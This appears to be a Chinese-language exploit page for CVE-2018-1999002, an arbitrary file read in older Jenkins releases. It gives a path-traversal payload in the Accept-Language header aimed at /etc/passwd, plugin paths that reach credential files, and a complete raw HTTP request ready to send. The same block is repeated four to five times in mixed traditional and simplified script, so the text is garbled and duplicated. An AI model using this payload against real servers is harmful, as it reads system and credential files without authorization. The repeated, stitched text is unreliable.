# CVE-2018-1999002 任意文件讀取漏洞/zh-cn
==影響版本==
Jenkins weekly 2.132 以及更早的版本
Jenkins LTS 2.121.1 以及更早的版本
Jenkins weekly 2.132 以及更早的版本
Jenkins LTS 2.121.1 以及更早的版本
可以讀取Windows系統服務器中的任意文件,且在特定而條件下也可以讀取Linux系統服務器中的文件.
==漏洞利用==
需要已經開啟了匿名用戶讀取權限,在請求頭中添加:
需要已經開啟了匿名用戶讀取權限,在請求頭中添加:
Accept-Language: /../../../../../../../../etc/passwd
處理請求中的包含路徑,比如/plugin/xxxx,可以嘗試:
/plugin/jquery-detached/.xml /plugin/jquery-detached/.key /plugin/credentials/.ini
Windows:
GET /plugin/credentials/.ini HTTP/1.1 Host: x.x.x.x:8080 Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Origin: http://x.x.x.x:8080 Referer: http://x.x.x.x:8080/ Accept-Encoding: gzip, deflate Accept-Language: /../../../../../../../../etc/passwd Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971 Connection: close
==影响版本==
Jenkins weekly 2.132以及更早的版本
Jenkins LTS 2.121.1以及更早的版本
可以讀取Windows系統服務器中的任意文件,且在特定而條件下也可以讀取Linux系統服務器中的文件.
==漏洞利用==
需要已經開啟了匿名用戶讀取權限,在請求頭中添加:
需要已經開啟了匿名用戶讀取權限,在請求頭中添加:
Accept-Language: /../../../../../../../../etc/passwd
處理請求中的包含路徑,比如/plugin/xxxx,可以嘗試:
/plugin/jquery-detached/.xml /plugin/jquery-detached/.key /plugin/credentials/.ini
Windows:
GET /plugin/credentials/.ini HTTP/1.1 Host: x.x.x.x:8080 Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Origin: http://x.x.x.x:8080 Referer: http://x.x.x.x:8080/ Accept-Encoding: gzip, deflate Accept-Language: /../../../../../../../../etc/passwd Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971 Connection: close
==影响版本==
Jenkins weekly 2.132以及更早的版本
Jenkins LTS 2.121.1以及更早的版本
可以读取Windows系统服务器中的任意文件,且在特定条件下也可以读取Linux系统服务器中的文件。
==漏洞利用==
需要已經開啟了匿名用戶讀取權限,在請求頭中添加:
需要已經開啟了匿名用戶讀取權限,在請求頭中添加:
Accept-Language: /../../../../../../../../etc/passwd
處理請求中的包含路徑,比如/plugin/xxxx,可以嘗試:
/plugin/jquery-detached/.xml /plugin/jquery-detached/.key /plugin/credentials/.ini
Windows:
GET /plugin/credentials/.ini HTTP/1.1 Host: x.x.x.x:8080 Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Origin: http://x.x.x.x:8080 Referer: http://x.x.x.x:8080/ Accept-Encoding: gzip, deflate Accept-Language: /../../../../../../../../etc/passwd Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971 Connection: close
==影响版本==
Jenkins weekly 2.132以及更早的版本
Jenkins LTS 2.121.1以及更早的版本
可以读取Windows系统服务器中的任意文件,且在特定条件下也可以读取Linux系统服务器中的文件。
==漏洞利用==
需要已经开启了匿名用户读取权限,在请求头中添加:
Accept-Language: /../../../../../../../../etc/passwd
處理請求中的包含路徑,比如/plugin/xxxx,可以嘗試:
/plugin/jquery-detached/.xml /plugin/jquery-detached/.key /plugin/credentials/.ini
Windows:
GET /plugin/credentials/.ini HTTP/1.1 Host: x.x.x.x:8080 Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Origin: http://x.x.x.x:8080 Referer: http://x.x.x.x:8080/ Accept-Encoding: gzip, deflate Accept-Language: /../../../../../../../../etc/passwd Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971 Connection: close
==影响版本==
Jenkins weekly 2.132以及更早的版本
Jenkins LTS 2.121.1以及更早的版本
可以读取Windows系统服务器中的任意文件,且在特定条件下也可以读取Linux系统服务器中的文件。
==漏洞利用==
需要已经开启了匿名用户读取权限,在请求头中添加:
Accept-Language: /../../../../../../../../etc/passwd
处理请求中的包含路径,比如/plugin/xxxx,可以尝试:
/plugin/jquery-detached/.xml /plugin/jquery-detached/.key /plugin/credentials/.ini
Windows:
GET /plugin/credentials/.ini HTTP/1.1 Host: x.x.x.x:8080 Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Origin: http://x.x.x.x:8080 Referer: http://x.x.x.x:8080/ Accept-Encoding: gzip, deflate Accept-Language: /../../../../../../../../etc/passwd Cookie: JSESSIONID.450017e3=x6kdpnkcgllh18wvlaohsqq8z; screenResolution=1920x1080; JSESSIONID.ccf0cd96=node09crp5bs5eglyrv874no3w48l0.node0; JSESSIONID.6551b177=14vcq2nsop6bw1u8urepj65kwv; td_cookie=1608956971 Connection: close
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容